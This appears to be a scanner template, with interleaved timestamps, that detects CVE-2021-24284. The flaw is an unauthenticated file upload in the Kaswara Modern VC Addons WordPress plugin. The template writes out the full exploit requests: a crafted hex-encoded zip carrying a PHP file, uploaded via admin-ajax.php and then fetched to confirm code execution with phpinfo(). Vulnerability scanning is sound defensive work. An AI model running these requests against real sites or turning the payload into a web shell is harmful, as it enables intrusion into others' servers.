2022-07-20 10:34:47 +00:00
id : CVE-2021-24284
info :
name : WordPress Kaswara Modern VC Addons - File Upload RCE
author : lamscun,pussycat0x,pdteam
severity : critical
description : |
The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP.
reference :
- https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5
2022-07-20 11:13:54 +00:00
- https://github.com/advisories/GHSA-wqvg-8q49-hjc7
2022-07-20 10:34:47 +00:00
- https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/
- https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/
- https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/
2022-07-20 11:13:54 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-24284
2022-07-20 10:34:47 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2021-24284
cwe-id : CWE-434
2022-07-20 11:13:54 +00:00
tags : cve,cve2021,wordpress,wp-plugin,rce,wp,intrusive,unauth,fileupload
2022-07-20 10:34:47 +00:00
variables :
zip_file : "{{to_lower(rand_text_alpha(6))}}"
php_file : "{{to_lower(rand_text_alpha(2))}}.php"
php_cmd : "<?php phpinfo();?>"
requests :
- raw :
- |
POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=------------------------d3be34324392a708
--------------------------d3be34324392a708
Content-Disposition : form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip"
Content-Type : application/octet-stream
{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}
--------------------------d3be34324392a708
Content-Disposition : form-data; name="fontsetname"
{{zip_file}}
--------------------------d3be34324392a708
Content-Disposition : form-data; name="action"
uploadFontIcon
--------------------------d3be34324392a708--
2022-07-20 11:05:52 +00:00
- |
GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1
Host : {{Hostname}}
req-condition : true
2022-07-20 10:34:47 +00:00
matchers-condition : and
matchers :
- type : word
2022-07-20 11:05:52 +00:00
part : body_1
2022-07-20 10:34:47 +00:00
words :
- "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"
2022-07-20 11:05:52 +00:00
- type : word
part : body_2
words :
- "phpinfo()"
2022-07-20 10:34:47 +00:00
- type : status
status :
2022-07-20 11:13:54 +00:00
- 200